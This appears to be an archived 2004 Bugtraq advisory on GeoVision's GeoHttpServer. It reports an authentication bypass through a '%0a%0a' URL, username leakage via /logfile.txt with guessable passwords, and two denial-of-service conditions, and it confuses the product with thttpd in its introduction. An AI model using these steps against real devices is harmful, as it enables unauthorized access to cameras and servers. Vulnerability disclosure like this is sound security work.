GeoHttpServer Authentification Bypass Vulnerability & D.O.S (Denial Of Service)

From: Rafel Ivgi, The-Insider (theinsider_at_012.net.il)
Date: 01/22/04

Next message: Steve G: "Re: Re[2]: Hijacking Apache 2 via mod_perl"

Previous message: André Malo: "Re: Hijacking Apache 2 via mod_perl"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: "bugtraq" <bugtraq@securityfocus.com>
Date: Thu, 22 Jan 2004 19:23:16 +0200

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Software: GeoHttpServer
Vendor: GEOVISION INC
http://www.geovision.com.tw
Versions: ALL
Platforms: Unix
Bug: Authentification Bypass Vulnerability & D.O.S (Denial
Of Service)
Risk: High
Exploitation: Remote with browser
Date: 22 Jan 2004
Author: Rafel Ivgi, The-Insider
e-mail: the_insider@mail.com
web: http://theinsider.deep-ice.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction
2) Bug
3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

thttpd is a free "Open Source" webserver that comes by default with unix
systems such as
FREEBSD and Linux.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

The GeoHttpServer Security is pretty good. Some users, who understand what
they are doing configure the server to authentificate login attempts.

The server uses this authentification code:
**********************************************
<html><head><title>Login In</title>
</head><body><center>
<form method="POST" action="phoneinfo">User Name:</BR>
  <input type="id" name="id" size="10"><p></p>
  Password:</BR>
  <input type="password" name="pwd" size="10">
  <p><input type="radio" name="ImageType" value="1" checked>JPEG 
  <input type="radio" name="ImageType" value="2">GIF</p>
  <p><input type="submit" name="send" value="Submit"><input type="reset"
name="CANCEL" value="Cancel"></center><center><br>
  </p>
</form>
</center>
</body>
</html>
**********************************************

Amazingly - http://>/%0a%0a Bypasses it!
You get the GeoHttpServer default Main Page.

Now the main page leads to functions that also require authentifiaction,
In order to retrieve a user name we can go to http://>/logfile.txt
Which generally contains the last logins and usernames.
In most cases the password will be the same as the user.

In addition there is an authentification form inside the server that
requires a name and
a password in order to see the server info/config.
Manipulating this links can cause Denial Of service of the server.

Another D.O.S caused by the server is an Internet Explorer D.O.S when
someone is watching
video stream from the server and presses the reconnect button, I.E has an
overflow.
Internet Explorer Version: 6.0.2600.0
Module Stuck: msxml3.dll
Module Version: 8.20.9415.0
Offset: 00013ed6

http://theinsider.deep-ice.com/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com
"Things that are unlikeable, are NOT impossible."

Next message: Steve G: "Re: Re[2]: Hijacking Apache 2 via mod_perl"

Previous message: André Malo: "Re: Hijacking Apache 2 via mod_perl"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]